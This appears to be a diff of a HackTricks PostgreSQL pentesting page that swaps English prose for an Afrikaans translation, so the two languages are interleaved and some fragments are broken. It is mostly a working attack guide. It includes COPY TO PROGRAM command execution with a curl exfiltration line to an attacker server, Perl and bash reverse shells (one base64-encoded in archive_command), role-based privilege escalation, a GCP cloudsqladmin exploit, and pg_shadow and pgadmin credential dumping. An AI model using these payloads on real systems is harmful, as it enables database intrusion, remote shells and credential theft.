pg_proc; ``` +## Lêerstelsel aksies -## File-system actions - -### Read directories and files - -From this [**commit** ](https://github.com/postgres/postgres/commit/0fdc8495bff02684142a44ab3bc5b18a8ca1863a)members of the defined **`DEFAULT_ROLE_READ_SERVER_FILES`** group (called **`pg_read_server_files`**) and **super users** can use the **`COPY`** method on any path (check out `convert_and_check_filename` in `genfile.c`): +### Lees gidslys en lêers +Vanaf hierdie [**commit**](https://github.com/postgres/postgres/commit/0fdc8495bff02684142a44ab3bc5b18a8ca1863a) kan lede van die gedefinieerde **`DEFAULT_ROLE_READ_SERVER_FILES`** groep (genaamd **`pg_read_server_files`**) en **supergebruikers** die **`COPY`** metode gebruik op enige pad (kyk na `convert_and_check_filename` in `genfile.c`): ```sql # Read file CREATE TABLE demo(t text); COPY demo from '/etc/passwd'; SELECT * FROM demo; ``` - {% hint style="warning" %} -Remember that if you aren't super user but has the **CREATEROLE** permissions you can **make yourself member of that group:** - +Onthou dat as jy nie 'n supergebruiker is nie, maar die **CREATEROLE**-permissies het, kan jy **jouself lid van daardie groep maak:** ```sql GRANT pg_read_server_files TO username; ``` - -[**More info.**](pentesting-postgresql.md#privilege-escalation-with-createrole) +[**Meer inligting.**](pentesting-postgresql.md#privilege-escalation-with-createrole) {% endhint %} -There are **other postgres functions** that can be used to **read file or list a directory**. Only **superusers** and **users with explicit permissions** can use them: - +Daar is **ander postgres funksies** wat gebruik kan word om **lêers te lees of 'n gids te lys**. Slegs **supergebruikers** en **gebruikers met uitdruklike toestemmings** kan dit gebruik: ```sql # Before executing these function go to the postgres DB (not in the template1) \c postgres @@ -299,12 +539,11 @@ SHOW data_directory; GRANT pg_read_server_files TO username; # Check CREATEROLE privilege escalation ``` +Jy kan **meer funksies** vind by [https://www.postgresql.org/docs/current/functions-admin.html](https://www.postgresql.org/docs/current/functions-admin.html) -You can find **more functions** in [https://www.postgresql.org/docs/current/functions-admin.html](https://www.postgresql.org/docs/current/functions-admin.html) +### Eenvoudige Lêerskryf -### Simple File Writing - -Only **super users** and members of **`pg_write_server_files`** can use copy to write files. +Slegs **super gebruikers** en lede van **`pg_write_server_files`** kan `copy` gebruik om lêers te skryf. {% code overflow="wrap" %} ```sql @@ -313,21 +552,18 @@ copy (select convert_from(decode('','base64'),'utf-8')) to '/ju {% endcode %} {% hint style="warning" %} -Remember that if you aren't super user but has the **`CREATEROLE`** permissions you can **make yourself member of that group:** - +Onthou dat as jy nie 'n supergebruiker is nie, maar die **`CREATEROLE`**-regte het, kan jy **jouself lid van daardie groep maak:** ```sql GRANT pg_write_server_files TO username; ``` - -[**More info.**](pentesting-postgresql.md#privilege-escalation-with-createrole) +[**Meer inligting.**](pentesting-postgresql.md#privilege-escalation-with-createrole) {% endhint %} -Remember that COPY cannot handle newline chars, therefore even if you are using a base64 payload y**ou need to send a one-liner**.\ -A very important limitation of this technique is that **`copy` cannot be used to write binary files as it modify some binary values.** +Onthou dat COPY geen newline karakters kan hanteer nie, daarom moet jy selfs as jy 'n base64 payload gebruik, 'n eenreëler stuur. 'n Baie belangrike beperking van hierdie tegniek is dat `copy` nie gebruik kan word om binêre lêers te skryf nie, omdat dit sommige binêre waardes wysig. -### **Binary files upload** +### **Oplaai van binêre lêers** -However, there are **other techniques to upload big binary files:** +Daar is egter **ander tegnieke om groot binêre lêers op te laai:** {% content-ref url="../pentesting-web/sql-injection/postgresql-injection/big-binary-files-upload-postgresql.md" %} [big-binary-files-upload-postgresql.md](../pentesting-web/sql-injection/postgresql-injection/big-binary-files-upload-postgresql.md) @@ -335,22 +571,19 @@ However, there are **other techniques to upload big binary files:** ## -**Bug bounty tip**: **sign up** for **Intigriti**, a premium **bug bounty platform created by hackers, for hackers**! Join us at [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) today, and start earning bounties up to **$100,000**! +**Bug bounty wenk**: **Teken aan** vir **Intigriti**, 'n premium **bug bounty platform wat deur hackers geskep is, vir hackers!** Sluit vandag nog by ons aan by [**https://go.intigriti.com/hacktricks**](https://go.intigriti.com/hacktricks) en begin om belonings tot **$100,000** te verdien! {% embed url="https://go.intigriti.com/hacktricks" %} ## RCE -### **RCE to program** - -Since[ version 9.3](https://www.postgresql.org/docs/9.3/release-9-3.html), only **super users** and member of the group **`pg_execute_server_program`** can use copy for RCE (example with exfiltration: +### **RCE na program** +Sedert [weergawe 9.3](https://www.postgresql.org/docs/9.3/release-9-3.html) kan slegs **supergebruikers** en lede van die groep **`pg_execute_server_program`** copy gebruik vir RCE (voorbeeld met eksfiltrering: ```sql '; copy (SELECT '') to program 'curl http://YOUR-SERVER?f=`ls -l|base64`'-- - ``` - -Example to exec: - +Voorbeeld om uit te voer: ```bash #PoC DROP TABLE IF EXISTS cmd_exec; @@ -363,78 +596,75 @@ DROP TABLE IF EXISTS cmd_exec; #Notice that in order to scape a single quote you need to put 2 single quotes COPY files FROM PROGRAM 'perl -MIO -e ''$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"192.168.0.104:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'''; ``` - {% hint style="warning" %} -Remember that if you aren't super user but has the **`CREATEROLE`** permissions you can **make yourself member of that group:** - +Onthou dat as jy nie 'n supergebruiker is nie, maar die **`CREATEROLE`**-regte het, kan jy **jouself lid van daardie groep maak:** ```sql GRANT pg_execute_server_program TO username; ``` - -[**More info.**](pentesting-postgresql.md#privilege-escalation-with-createrole) +[**Meer inligting.**](pentesting-postgresql.md#privilege-escalation-with-createrole) {% endhint %} -Or use the `multi/postgres/postgres_copy_from_program_cmd_exec` module from **metasploit**.\ -More information about this vulnerability [**here**](https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5). While reported as CVE-2019-9193, Postges declared this was a [feature and will not be fixed](https://www.postgresql.org/about/news/cve-2019-9193-not-a-security-vulnerability-1935/). +Of gebruik die `multi/postgres/postgres_copy_from_program_cmd_exec` module van **metasploit**.\ +Meer inligting oor hierdie kwesbaarheid [**hier**](https://medium.com/greenwolf-security/authenticated-arbitrary-command-execution-on-postgresql-9-3-latest-cd18945914d5). Terwyl dit as CVE-2019-9193 aangemeld is, het Postges verklaar dat dit 'n [kenmerk is en nie reggemaak sal word nie](https://www.postgresql.org/about/news/cve-2019-9193-not-a-security-vulnerability-1935/). -### RCE with PostgreSQL Languages +### RCE met PostgreSQL-tale {% content-ref url="../pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-languages.md" %} [rce-with-postgresql-languages.md](../pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-languages.md) {% endcontent-ref %} -### RCE with PostgreSQL extensions +### RCE met PostgreSQL-uitbreidings -Once you have **learned** from the previous post **how to upload binary files** you could try obtain **RCE uploading a postgresql extension and loading it**. +Sodra jy **geleer** het van die vorige pos **hoe om binêre lêers op te laai**, kan jy probeer om **RCE te verkry deur 'n postgresql-uitbreiding op te laai en dit te laai**. {% content-ref url="../pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-extensions.md" %} [rce-with-postgresql-extensions.md](../pentesting-web/sql-injection/postgresql-injection/rce-with-postgresql-extensions.md) {% endcontent-ref %} -### PostgreSQL configuration file RCE +### PostgreSQL-konfigurasie-lêer RCE -The **configuration file** of postgresql is **writable** by the **postgres user** which is the one running the database, so as **superuser** you can write files in the filesystem, and therefore you can **overwrite this file.** +Die **konfigurasie-lêer** van postgresql is **skryfbaar** deur die **postgres-gebruiker** wat die databasis laat loop, sodat jy as **supergebruiker** lêers in die lêersisteem kan skryf, en dus kan jy **hierdie lêer oorskryf**. ![](<../.gitbook/assets/image (303).png>) -#### **RCE with ssl\_passphrase\_command** +#### **RCE met ssl\_passphrase\_command** -More information [about this technique here](https://pulsesecurity.co.nz/articles/postgres-sqli). +Meer inligting [oor hierdie tegniek hier](https://pulsesecurity.co.nz/articles/postgres-sqli). -The configuration file have some interesting attributes that can lead to RCE: +Die konfigurasie-lêer het 'n paar interessante eienskappe wat kan lei tot RCE: -* `ssl_key_file = '/etc/ssl/private/ssl-cert-snakeoil.key'` Path to the private key of the database -* `ssl_passphrase_command = ''` If the private file is protected by password (encrypted) postgresql will **execute the command indicated in this attribute**. -* `ssl_passphrase_command_supports_reload = off` **If** this attribute is **on** the **command** executed if the key is protected by password **will be executed** when `pg_reload_conf()` is **executed**. +* `ssl_key_file = '/etc/ssl/private/ssl-cert-snakeoil.key'` Pad na die privaatsleutel van die databasis +* `ssl_passphrase_command = ''` As die privaat lêer deur 'n wagwoord beskerm word (gekripteer), sal postgresql die opdrag uitvoer wat in hierdie eienskap aangedui word. +* `ssl_passphrase_command_supports_reload = off` **As** hierdie eienskap **aan** is, sal die **opdrag** uitgevoer word as die sleutel deur 'n wagwoord beskerm word wanneer `pg_reload_conf()` **uitgevoer** word. -Then, an attacker will need to: +Dan sal 'n aanvaller nodig hê om: -1. **Dump private key** from the server -2. **Encrypt** downloaded private key: - 1. `rsa -aes256 -in downloaded-ssl-cert-snakeoil.key -out ssl-cert-snakeoil.key` -3. **Overwrite** -4. **Dump** the current postgresql **configuration** -5. **Overwrite** the **configuration** with the mentioned attributes configuration: - 1. `ssl_passphrase_command = 'bash -c "bash -i >& /dev/tcp/127.0.0.1/8111 0>&1"'` - 2. `ssl_passphrase_command_supports_reload = on` -6. Execute `pg_reload_conf()` +1. **Dump privaatsleutel** van die bediener +2. **Versleutel** afgelaai privaatsleutel: +1. `rsa -aes256 -in downloaded-ssl-cert-snakeoil.key -out ssl-cert-snakeoil.key` +3. **Oorskryf** +4. **Dump** die huidige postgresql-**konfigurasie** +5. **Oorskryf** die **konfigurasie** met die genoemde eienskappe-konfigurasie: +1. `ssl_passphrase_command = 'bash -c "bash -i >& /dev/tcp/127.0.0.1/8111 0>&1"'` +2. `ssl_passphrase_command_supports_reload = on` +6. Voer `pg_reload_conf()` uit -While testing this I noticed that this will only work if the **private key file has privileges 640**, it's **owned by root** and by the **group ssl-cert or postgres** (so the postgres user can read it), and is placed in _/var/lib/postgresql/12/main_. +Tydens die toets van hierdie het ek opgemerk dat dit slegs sal werk as die **privaatsleutel-lêer bevoegdhede 640** het, dit **deur root besit word** en deur die **groep ssl-cert of postgres** (sodat die postgres-gebruiker dit kan lees), en in _/var/lib/postgresql/12/main_ geplaas is. -#### **RCE with archive\_command** +#### **RCE met archive\_command** -**More** [**information about this config and about WAL here**](https://medium.com/dont-code-me-on-that/postgres-sql-injection-to-rce-with-archive-command-c8ce955cf3d3)**.** +**Meer** [**inligting oor hierdie konfigurasie en oor WAL hier**](https://medium.com/dont-code-me-on-that/postgres-sql-injection-to-rce-with-archive-command-c8ce955cf3d3)**.** -Another attribute in the configuration file that is exploitable is `archive_command`. +'n Ander eienskap in die konfigurasie-lêer wat uitgebuit kan word, is `archive_command`. -For this to work, the `archive_mode` setting has to be `'on'` or `'always'`. If that is true, then we could overwrite the command in `archive_command` and force it to execute via the WAL (write-ahead logging) operations. +Om dit te laat werk, moet die `archive_mode`-instelling `'on'` of `'always'` wees. As dit waar is, kan ons die opdrag in `archive_command` oorskryf en dit dwing om uitgevoer te word via die WAL (write-ahead logging) operasies. -The general steps are: +Die algemene stappe is: -1. Check whether archive mode is enabled: `SELECT current_setting('archive_mode')` -2. Overwrite `archive_command` with the payload. For eg, a reverse shell: `archive_command = 'echo "dXNlIFNvY2tldDskaT0iMTAuMC4wLjEiOyRwPTQyNDI7c29ja2V0KFMsUEZfSU5FVCxTT0NLX1NUUkVBTSxnZXRwcm90b2J5bmFtZSgidGNwIikpO2lmKGNvbm5lY3QoUyxzb2NrYWRkcl9pbigkcCxpbmV0X2F0b24oJGkpKSkpe29wZW4oU1RESU4sIj4mUyIpO29wZW4oU1RET1VULCI+JlMiKTtvcGVuKFNUREVSUiwiPiZTIik7ZXhlYygiL2Jpbi9zaCAtaSIpO307" | base64 --decode | perl'` -3. Reload the config: `SELECT pg_reload_conf()` -4. Force the WAL operation to run, which will call the archive command: `SELECT pg_switch_wal()` or `SELECT pg_switch_xlog()` for some Postgres versions +1. Kontroleer of argiefmodus geaktiveer is: `SELECT current_setting('archive_mode')` +2. Oorskryf `archive_command` met die payload. Byvoorbeeld, 'n omgekeerde dop: `archive_command = 'echo "dXNlIFNvY2tldDskaT0iMTAuMC4wLjEiOyRwPTQyNDI7c29ja2V0KFMsUEZfSU5FVCxTT0NLX1NUUkVBTSxnZXRwcm90b2J5bmFtZSgidGNwIikpO2lmKGNvbm5lY3QoUyxzb2NrYWRkcl9pbigkcCxpbmV0X2F0b24oJGkpKSkpe29wZW4oU1RESU4sIj4mUyIpO29wZW4oU1RET1VULCI+JlMiKTtvcGVuKFNUREVSUiwiPiZTIik7ZXhlYygiL2Jpbi9zaCAtaSIpO307" | base64 --decode | perl'` +3. Laai die konfigurasie weer: `SELECT pg_reload_conf()` +4. Dwang die WAL-operasie om uit te voer, wat die argiefopdrag sal oproep: `SELECT pg_switch_wal()` of `SELECT pg_switch_xlog()` vir sommige Postgres-weergawes ## **Postgres Privesc** @@ -442,10 +672,9 @@ The general steps are: #### **Grant** -According to the [**docs**](https://www.postgresql.org/docs/13/sql-grant.html): _Roles having **`CREATEROLE`** privilege can **grant or revoke membership in any role** that is **not** a **superuser**._ - -So, if you have **`CREATEROLE`** permission you could grant yourself access to other **roles** (that aren't superuser) that can give you the option to read & write files and execute commands: +Volgens die [**dokumentasie**](https://www.postgresql.org/docs/13/sql-grant.html): _Rolle wat die **`CREATEROLE`**-bevoegdheid het, kan **lidmaatskap in enige rol toeken of herroep** wat **nie** 'n **supergebruiker** is nie._ +Dus, as jy **`CREATEROLE`** toestemming het, kan jy jouself toegang gee tot ander **rolle** (wat nie supergebruiker is nie) wat jou die opsie kan gee om lêers te lees en skryf en opdragte uit te voer: ```sql # Access to execute commands GRANT pg_execute_server_program TO username; @@ -454,27 +683,21 @@ GRANT pg_read_server_files TO username; # Access to write files GRANT pg_write_server_files TO username; ``` +#### Verander Wagwoord -#### Modify Password - -Users with this role can also **change** the **passwords** of other **non-superusers**: - +Gebruikers met hierdie rol kan ook die wagwoorde van ander nie-supergebruikers **verander**: ```sql #Change password ALTER USER user_name WITH PASSWORD 'new_password'; ``` +#### Privesc na SUPERUSER -#### Privesc to SUPERUSER - -It's pretty common to find that **local users can login in PostgreSQL without providing any password**. Therefore, once you have gathered **permissions to execute code** you can abuse these permissions to gran you **`SUPERUSER`** role: - +Dit is redelik algemeen om te vind dat **plaaslike gebruikers kan inlog in PostgreSQL sonder om enige wagwoord te verskaf**. Daarom, sodra jy **toestemmings het om kode uit te voer**, kan jy hierdie toestemmings misbruik om die **`SUPERUSER`** rol te verkry: ```sql COPY (select '') to PROGRAM 'psql -U -c "ALTER USER WITH SUPERUSER;"'; ``` - {% hint style="info" %} -This is usually possible because of the following lines in the **`pg_hba.conf`** file: - +Dit is gewoonlik moontlik as gevolg van die volgende lyne in die **`pg_hba.conf`** lêer: ```bash # "local" is for Unix domain socket connections only local all all trust @@ -485,147 +708,131 @@ host all all ::1/128 trust ``` {% endhint %} -### **ALTER TABLE privesc** +### **ALTER TABEL privesc** -In [**this writeup**](https://www.wiz.io/blog/the-cloud-has-an-isolation-problem-postgresql-vulnerabilities) is explained how it was possible to **privesc** in Postgres GCP abusing ALTER TABLE privilege that was granted to the user. +In [**hierdie skryfstuk**](https://www.wiz.io/blog/the-cloud-has-an-isolation-problem-postgresql-vulnerabilities) word verduidelik hoe dit moontlik was om **privesc** in Postgres GCP te doen deur misbruik te maak van die ALTER TABEL-voorreg wat aan die gebruiker verleen is. -When you try to **make another user owner of a table** you should get an **error** preventing it, but apparently GCP gave that **option to the not-superuser postgres user** in GCP: +Wanneer jy probeer om 'n **ander gebruiker eienaar van 'n tabel** te maak, behoort jy 'n **fout** te kry wat dit verhoed, maar blykbaar het GCP daardie **opsie aan die nie-supergebruiker postgres-gebruiker** gegee:
-Joining this idea with the fact that when the **INSERT/UPDATE/**[**ANALYZE**](https://www.postgresql.org/docs/13/sql-analyze.html) commands are executed on a **table with an index function**, the **function** is **called** as part of the command with the **table** **owner’s permissions**. It's possible to create an index with a function and give owner permissions to a **super user** over that table, and then run ANALYZE over the table with the malicious function that will be able to execute commands because it's using the privileges of the owner. - +Deur hierdie idee te koppel met die feit dat wanneer die **INSERT/UPDATE/**[**ANALYZE**](https://www.postgresql.org/docs/13/sql-analyze.html)-opdragte uitgevoer word op 'n **tabel met 'n indeksfunksie**, word die **funksie** as deel van die opdrag **geroep** met die **eienaar se toestemmings**. Dit is moontlik om 'n indeks met 'n funksie te skep en eienaarstoestemmings aan 'n **supergebruiker** oor daardie tabel te gee, en dan ANALYZE uit te voer oor die tabel met die skadelike funksie wat opdragte kan uitvoer omdat dit die voorregte van die eienaar gebruik. ```c -GetUserIdAndSecContext(&save_userid, &save_sec_context); -SetUserIdAndSecContext(onerel->rd_rel->relowner, - save_sec_context | SECURITY_RESTRICTED_OPERATION); +GetUserIdAndSecContext(&save_userid, &save_sec_context); +SetUserIdAndSecContext(onerel->rd_rel->relowner, +save_sec_context | SECURITY_RESTRICTED_OPERATION); ``` +#### Uitbuiting -#### Exploitation - -1. Start by creating a new table. -2. Insert some irrelevant content into the table to provide data for the index function. -3. Develop a malicious index function that contains a code execution payload, allowing for unauthorized commands to be executed. -4. ALTER the table's owner to "cloudsqladmin," which is GCP's superuser role exclusively used by Cloud SQL to manage and maintain the database. -5. Perform an ANALYZE operation on the table. This action compels the PostgreSQL engine to switch to the user context of the table's owner, "cloudsqladmin." Consequently, the malicious index function is called with the permissions of "cloudsqladmin," thereby enabling the execution of the previously unauthorized shell command. - -In PostgreSQL, this flow looks something like this: +1. Begin deur 'n nuwe tabel te skep. +2. Voeg irrelevante inhoud by die tabel in om data vir die indeksfunksie te voorsien. +3. Ontwikkel 'n skadelike indeksfunksie wat 'n koderingsuitvoerlading bevat, wat die uitvoering van ongemagtigde bevele moontlik maak. +4. ALTER die eienaar van die tabel na "cloudsqladmin," wat GCP se supergebruikersrol is wat uitsluitlik deur Cloud SQL gebruik word om die databasis te bestuur en te onderhou. +5. Voer 'n ANALYZE-operasie op die tabel uit. Hierdie aksie dwing die PostgreSQL-enjin om oor te skakel na die gebruikerskonteks van die tabel se eienaar, "cloudsqladmin." Gevolglik word die skadelike indeksfunksie geroep met die toestemmings van "cloudsqladmin," wat die uitvoering van die voorheen ongemagtigde skilbevel moontlik maak. +In PostgreSQL lyk hierdie vloei soos volg: ```sql CREATE TABLE temp_table (data text); CREATE TABLE shell_commands_results (data text); - + INSERT INTO temp_table VALUES ('dummy content'); - -/* PostgreSQL does not allow creating a VOLATILE index function, so first we create IMMUTABLE index function */ + +/* PostgreSQL does not allow creating a VOLATILE index function, so first we create IMMUTABLE index function */ CREATE OR REPLACE FUNCTION public.suid_function(text) RETURNS text - LANGUAGE sql IMMUTABLE AS 'select ''nothing'';'; - +LANGUAGE sql IMMUTABLE AS 'select ''nothing'';'; + CREATE INDEX index_malicious ON public.temp_table (suid_function(data)); - + ALTER TABLE temp_table OWNER TO cloudsqladmin; - -/* Replace the function with VOLATILE index function to bypass the PostgreSQL restriction */ + +/* Replace the function with VOLATILE index function to bypass the PostgreSQL restriction */ CREATE OR REPLACE FUNCTION public.suid_function(text) RETURNS text - LANGUAGE sql VOLATILE AS 'COPY public.shell_commands_results (data) FROM PROGRAM ''/usr/bin/id''; select ''test'';'; - +LANGUAGE sql VOLATILE AS 'COPY public.shell_commands_results (data) FROM PROGRAM ''/usr/bin/id''; select ''test'';'; + ANALYZE public.temp_table; ``` - -Then, the `shell_commands_results` table will contain the output of the executed code: - +Dan sal die `shell_commands_results` tabel die uitvoer van die uitgevoerde kode bevat: ``` uid=2345(postgres) gid=2345(postgres) groups=2345(postgres) ``` +### Plaaslike Aantekening -### Local Login - -Some misconfigured postgresql instances might allow login of any local user, it's possible to local from 127.0.0.1 using the **`dblink` function**: - +Sommige verkeerd gekonfigureerde postgresql-instanties mag enige plaaslike gebruiker toelaat om aan te teken, dit is moontlik om plaaslik vanaf 127.0.0.1 aan te teken deur die **`dblink`-funksie** te gebruik: ```sql \du * # Get Users \l # Get databases SELECT * FROM dblink('host=127.0.0.1 - port=5432 - user=someuser - password=supersecret - dbname=somedb', - 'SELECT usename,passwd from pg_shadow') +port=5432 +user=someuser +password=supersecret +dbname=somedb', +'SELECT usename,passwd from pg_shadow') RETURNS (result TEXT); ``` - {% hint style="warning" %} -Note that for the previos query to work **the function `dblink` needs to exist**. If it doesn't you could try to create it with - +Let daarop dat vir die vorige navraag om te werk, **moet die funksie `dblink` bestaan**. As dit nie bestaan nie, kan jy probeer om dit te skep met ```sql CREATE EXTENSION dblink; ``` {% endhint %} -If you have the password of a user with more privileges, but the user is not allowed to login from an external IP you can use the following function to execute queries as that user: - +As jy die wagwoord van 'n gebruiker met meer bevoegdhede het, maar die gebruiker mag nie vanaf 'n eksterne IP-adres aanmeld nie, kan jy die volgende funksie gebruik om navrae uit te voer as daardie gebruiker: ```sql SELECT * FROM dblink('host=127.0.0.1 - user=someuser - dbname=somedb', - 'SELECT usename,passwd from pg_shadow') - RETURNS (result TEXT); +user=someuser +dbname=somedb', +'SELECT usename,passwd from pg_shadow') +RETURNS (result TEXT); ``` - -It's possible to check if this function exists with: - +Dit is moontlik om te kontroleer of hierdie funksie bestaan met: ```sql SELECT * FROM pg_proc WHERE proname='dblink' AND pronargs=2; ``` +### **Aangepaste gedefinieerde funksie met** SECURITY DEFINER -### **Custom defined function with** SECURITY DEFINER +[**In hierdie uiteensetting**](https://www.wiz.io/blog/hells-keychain-supply-chain-attack-in-ibm-cloud-databases-for-postgresql), was pentesters in staat om privesc binne 'n postgres-instansie wat deur IBM voorsien word, omdat hulle **hierdie funksie met die SECURITY DEFINER-vlag gevind het**: -[**In this writeup**](https://www.wiz.io/blog/hells-keychain-supply-chain-attack-in-ibm-cloud-databases-for-postgresql), pentesters were able to privesc inside a postgres instance provided by IBM, because they **found this function with the SECURITY DEFINER flag**: +
CREATE OR REPLACE FUNCTION public.create_subscription(IN subscription_name text,IN host_ip text,IN portnum text,IN password text,IN username text,IN db_name text,IN publisher_name text)
+RETURNS text
+LANGUAGE 'plpgsql'
+    VOLATILE SECURITY DEFINER
+    PARALLEL UNSAFE
+COST 100
 
-
CREATE OR REPLACE FUNCTION public.create_subscription(IN subscription_name text,IN host_ip text,IN portnum text,IN password text,IN username text,IN db_name text,IN publisher_name text) 
-    RETURNS text 
-    LANGUAGE 'plpgsql' 
-    VOLATILE SECURITY DEFINER 
-    PARALLEL UNSAFE 
-    COST 100 
-     
-AS $BODY$ 
-                DECLARE 
-                     persist_dblink_extension boolean; 
-                BEGIN 
-                    persist_dblink_extension := create_dblink_extension(); 
-                    PERFORM dblink_connect(format('dbname=%s', db_name)); 
-                    PERFORM dblink_exec(format('CREATE SUBSCRIPTION %s CONNECTION ''host=%s port=%s password=%s user=%s dbname=%s sslmode=require'' PUBLICATION %s', 
-                                               subscription_name, host_ip, portNum, password, username, db_name, publisher_name)); 
-                    PERFORM dblink_disconnect(); 
-… 
+AS $BODY$
+DECLARE
+persist_dblink_extension boolean;
+BEGIN
+persist_dblink_extension := create_dblink_extension();
+PERFORM dblink_connect(format('dbname=%s', db_name));
+PERFORM dblink_exec(format('CREATE SUBSCRIPTION %s CONNECTION ''host=%s port=%s password=%s user=%s dbname=%s sslmode=require'' PUBLICATION %s',
+subscription_name, host_ip, portNum, password, username, db_name, publisher_name));
+PERFORM dblink_disconnect();
+…
 

 
-As [**explained in the docs**](https://www.postgresql.org/docs/current/sql-createfunction.html) a function with **SECURITY DEFINER is executed** with the privileges of the **user that owns it**. Therefore, if the function is **vulnerable to SQL Injection** or is doing some **privileged actions with params controlled by the attacker**, it could be abused to **escalate privileges inside postgres**.
-
-In the line 4 of the previous code you can see that the function has the **SECURITY DEFINER** flag.
+Soos [**verduidelik in die dokumentasie**](https://www.postgresql.org/docs/current/sql-createfunction.html) word 'n funksie met **SECURITY DEFINER uitgevoer** met die voorregte van die **gebruiker wat dit besit**. Daarom, as die funksie **kwesbaar is vir SQL-injeksie** of as dit enige **voorregtehandelinge met parameters wat deur die aanvaller beheer word**, kan dit misbruik word om voorregte binne postgres te **verhoog**.
 
+In lyn 4 van die vorige kode kan jy sien dat die funksie die **SECURITY DEFINER**-vlag het.
 ```sql
-CREATE SUBSCRIPTION test3 CONNECTION 'host=127.0.0.1 port=5432 password=a 
-user=ibm dbname=ibmclouddb sslmode=require' PUBLICATION test2_publication 
+CREATE SUBSCRIPTION test3 CONNECTION 'host=127.0.0.1 port=5432 password=a
+user=ibm dbname=ibmclouddb sslmode=require' PUBLICATION test2_publication
 WITH (create_slot = false); INSERT INTO public.test3(data) VALUES(current_user);
 ```
-
-And then **execute commands**:
+En voer dan **opdragte uit**:
 
 

 
-### Pass Burteforce with PL/pgSQL
+### Pas Burteforce toe met PL/pgSQL
 
-**PL/pgSQL** is a **fully featured programming language** that offers greater procedural control compared to SQL. It enables the use of **loops** and other **control structures** to enhance program logic. In addition, **SQL statements** and **triggers** have the capability to invoke functions that are created using the **PL/pgSQL language**. This integration allows for a more comprehensive and versatile approach to database programming and automation.\
-**You can abuse this language in order to ask PostgreSQL to brute-force the users credentials.**
+**PL/pgSQL** is 'n **volledig uitgeruste programmeringstaal** wat groter prosedurele beheer bied in vergelyking met SQL. Dit maak die gebruik van **lusse** en ander **beheerstrukture** moontlik om programlogika te verbeter. Daarbenewens het **SQL-opdragte** en **treffers** die vermoë om funksies aan te roep wat met die **PL/pgSQL-taal** geskep is. Hierdie integrasie maak 'n meer omvattende en veelsydige benadering tot databasisprogrammering en outomatisering moontlik.\
+**Jy kan hierdie taal misbruik om PostgreSQL te vra om die gebruikers se geloofsbriewe te burteforce.**
 
 {% content-ref url="../pentesting-web/sql-injection/postgresql-injection/pl-pgsql-password-bruteforce.md" %}
 [pl-pgsql-password-bruteforce.md](../pentesting-web/sql-injection/postgresql-injection/pl-pgsql-password-bruteforce.md)
 {% endcontent-ref %}
 
 ## **POST**
-
 ```
 msf> use auxiliary/scanner/postgres/postgres_hashdump
 msf> use auxiliary/scanner/postgres/postgres_schemadump
@@ -633,11 +840,9 @@ msf> use auxiliary/admin/postgres/postgres_readfile
 msf> use exploit/linux/postgres/postgres_payload
 msf> use exploit/windows/postgres/postgres_payload
 ```
+### logboekhouding
 
-### logging
-
-Inside the _**postgresql.conf**_ file you can enable postgresql logs changing:
-
+Binne die _**postgresql.conf**_ lêer kan jy postgresql-logboeke aktiveer deur die volgende te verander:
 ```bash
 log_statement = 'all'
 log_filename = 'postgresql-%Y-%m-%d_%H%M%S.log'
@@ -646,46 +851,43 @@ sudo service postgresql restart
 #Find the logs in /var/lib/postgresql//main/log/
 #or in /var/lib/postgresql//main/pg_log/
 ```
-
-Then, **restart the service**.
+Daarna, **herlaai die diens**.
 
 ### pgadmin
 
-[pgadmin](https://www.pgadmin.org) is an administration and development platform for PostgreSQL.\
-You can find **passwords** inside the _**pgadmin4.db**_ file\
-You can decrypt them using the _**decrypt**_ function inside the script: [https://github.com/postgres/pgadmin4/blob/master/web/pgadmin/utils/crypto.py](https://github.com/postgres/pgadmin4/blob/master/web/pgadmin/utils/crypto.py)
-
+[pgadmin](https://www.pgadmin.org) is 'n administrasie- en ontwikkelingsplatform vir PostgreSQL.\
+Jy kan **wagwoorde** binne die _**pgadmin4.db**_ lêer vind.\
+Jy kan hulle ontsluit deur die _**decrypt**_ funksie binne die skripsie te gebruik: [https://github.com/postgres/pgadmin4/blob/master/web/pgadmin/utils/crypto.py](https://github.com/postgres/pgadmin4/blob/master/web/pgadmin/utils/crypto.py)
 ```bash
 sqlite3 pgadmin4.db ".schema"
 sqlite3 pgadmin4.db "select * from user;"
 sqlite3 pgadmin4.db "select * from server;"
 string pgadmin4.db
 ```
-
 ### pg\_hba
 
-Client authentication in PostgreSQL is managed through a configuration file called **pg_hba.conf**. This file contains a series of records, each specifying a connection type, client IP address range (if applicable), database name, user name, and the authentication method to use for matching connections. The first record that matches the connection type, client address, requested database, and user name is used for authentication. There is no fallback or backup if authentication fails. If no record matches, access is denied.
+Kliëntverifikasie in PostgreSQL word hanteer deur middel van 'n konfigurasie-lêer genaamd **pg_hba.conf**. Hierdie lêer bevat 'n reeks rekords wat elk 'n verbindingskategorie, kliënt-IP-adresreeks (indien van toepassing), databasisnaam, gebruikersnaam en die verifikasiemetode spesifiseer wat gebruik moet word vir ooreenstemmende verbindings. Die eerste rekord wat ooreenstem met die verbindingskategorie, kliëntadres, versoekte databasis en gebruikersnaam, word gebruik vir verifikasie. Daar is geen terugval of rugsteun as verifikasie misluk nie. As geen rekord ooreenstem nie, word toegang geweier.
 
-The available password-based authentication methods in pg_hba.conf are **md5**, **crypt**, and **password**. These methods differ in how the password is transmitted: MD5-hashed, crypt-encrypted, or clear-text. It's important to note that the crypt method cannot be used with passwords that have been encrypted in pg_authid.
+Die beskikbare wagwoordgebaseerde verifikasiemetodes in pg_hba.conf is **md5**, **crypt** en **password**. Hierdie metodes verskil in hoe die wagwoord oorgedra word: MD5-gehasht, crypt-gekripteer of duidelike teks. Dit is belangrik om daarop te let dat die crypt-metode nie gebruik kan word met wagwoorde wat in pg_authid gekripteer is nie.
 
 

 
-Learn AWS hacking from zero to hero with htARTE (HackTricks AWS Red Team Expert)!
+Leer AWS-hacking van nul tot held met htARTE (HackTricks AWS Red Team Expert)!
 
-Other ways to support HackTricks:
+Ander maniere om HackTricks te ondersteun:
 
-* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
-* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
